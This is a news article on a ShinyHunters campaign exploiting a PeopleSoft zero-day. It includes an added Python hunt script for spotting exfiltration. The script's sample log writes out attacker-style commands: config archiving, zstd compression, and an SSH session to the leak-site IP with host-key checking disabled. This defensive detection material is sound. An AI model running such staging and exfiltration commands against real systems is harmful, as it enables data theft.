PeopleSoft 0-day affecting hundreds of organizations steals gigabytes of data


“While a number of organizations successfully blocked the operation or fixed the vulnerabilities, others encountered a problem, resulting in stolen data being published on the ShinyHunters DLS,” Mandiant said. (DLS is short for data leak site.)

An examination of the bash script left on the compromised site shows that the attackers also enumerated items on the host, including PeopleSoft mappings, policy views, and WebLogic server XML configuration. The attackers then established an SSH connection to 176.120.22.24, the IP address of ShinyHunters’ DLS. Before being sent, the collected data was compressed with the zstd tool. In one case, the DLS listed 48GB of data taken from a single victim.
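The chain the script reveals (config-file enumeration, zstd compression, then an SSH session to the leak-site IP) is something defenders can hunt for in process-execution telemetry. The following is an added example, not code from Mandiant, Rapid7 or the article: a Python hunt over constructed, hypothetical log lines that flags both the exact indicator quoted above (the leak-site IP) and the more general behaviour of compression followed shortly by SSH or SCP to a non-private address. The log format, host names, user names and file paths are assumptions made for the example.

```python
import ipaddress
import re
import shlex
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta

# Indicator taken from the article: the IP of the ShinyHunters leak site
# that the exfiltration SSH session connected to.
LEAK_SITE_IP = "176.120.22.24"

# Constructed sample telemetry (not real data). Hypothetical format:
# "<ISO timestamp> <host> <user> <command line>", one process start per line.
SAMPLE_LOG = """\
2026-01-14T03:12:01Z app01 psadm bash /tmp/.s.sh
2026-01-14T03:12:05Z app01 psadm find /opt/oracle/psft -name '*.xml'
2026-01-14T03:13:40Z app01 psadm tar cf /tmp/out.tar /opt/oracle/psft/config
2026-01-14T03:13:52Z app01 psadm zstd -19 /tmp/out.tar
2026-01-14T03:14:10Z app01 psadm ssh -o StrictHostKeyChecking=no user@176.120.22.24
2026-01-14T03:20:00Z app02 root ssh admin@10.0.5.7
2026-01-14T03:21:00Z app02 root zstd -d backup.zst
"""

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<host>\S+)\s+(?P<user>\S+)\s+(?P<cmd>.+)$")
IPV4_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")


@dataclass
class Event:
    ts: datetime
    host: str
    user: str
    cmd: str


@dataclass
class Finding:
    host: str
    kind: str   # "ioc" = known leak-site IP seen; "behavior" = compress-then-ship pattern
    cmd: str


def parse(log: str) -> list[Event]:
    """Parse the hypothetical log format into Event records, skipping malformed lines."""
    events = []
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.fromisoformat(m["ts"].replace("Z", "+00:00"))
            events.append(Event(ts, m["host"], m["user"], m["cmd"]))
    return events


def is_private(ip: str) -> bool:
    return ipaddress.ip_address(ip).is_private


def hunt(log: str, window: timedelta = timedelta(minutes=10)) -> list[Finding]:
    """Flag (a) any command referencing the leak-site IP and (b) a zstd compression
    followed within `window` by ssh/scp/sftp to a non-private IPv4 address on the same host."""
    findings = []
    by_host: dict[str, list[Event]] = defaultdict(list)
    for e in parse(log):
        by_host[e.host].append(e)

    for host, evs in by_host.items():
        last_compress = None
        for e in sorted(evs, key=lambda x: x.ts):
            argv = shlex.split(e.cmd)
            if not argv:
                continue
            if LEAK_SITE_IP in e.cmd:
                findings.append(Finding(host, "ioc", e.cmd))
            # Only compression counts as staging; "zstd -d" is a decompress and is ignored.
            if argv[0] == "zstd" and "-d" not in argv and "--decompress" not in argv:
                last_compress = e
            elif argv[0] in ("ssh", "scp", "sftp"):
                external = [ip for ip in IPV4_RE.findall(e.cmd) if not is_private(ip)]
                if last_compress and external and e.ts - last_compress.ts <= window:
                    findings.append(Finding(host, "behavior", e.cmd))
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_LOG):
        print(f"{f.host}: [{f.kind}] {f.cmd}")
```

The IP match is the cheap, exact check; the compress-then-ship rule is what catches the same tradecraft after the leak-site address changes, at the cost of occasional false positives from legitimate backups pushed to external hosts, which is why it only fires when the SSH target is outside private address space.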



A slightly modified version of ShinyHunters’ DLS.

Credit: Mandiant


ShinyHunters has been operating since 2019. Over the past few years, it has carried out numerous hacks against major companies around the world, affecting millions of people downstream. A small sample of those affected includes Ticketmaster (through the breach of Snowflake, which stored its data), Spain’s largest bank, Santander, and Salesforce (and, through it, Google and many other companies). ShinyHunters uses a variety of methods to gain initial access to its targets, including exploiting cloud misconfigurations and software vulnerabilities, OAuth token theft, and other techniques.

Mandiant and Rapid7 are both publishing indicators of compromise. They are also advising PeopleSoft customers on what they need to do immediately. Given ShinyHunters’ track record, all PeopleSoft users would do well to heed that advice.


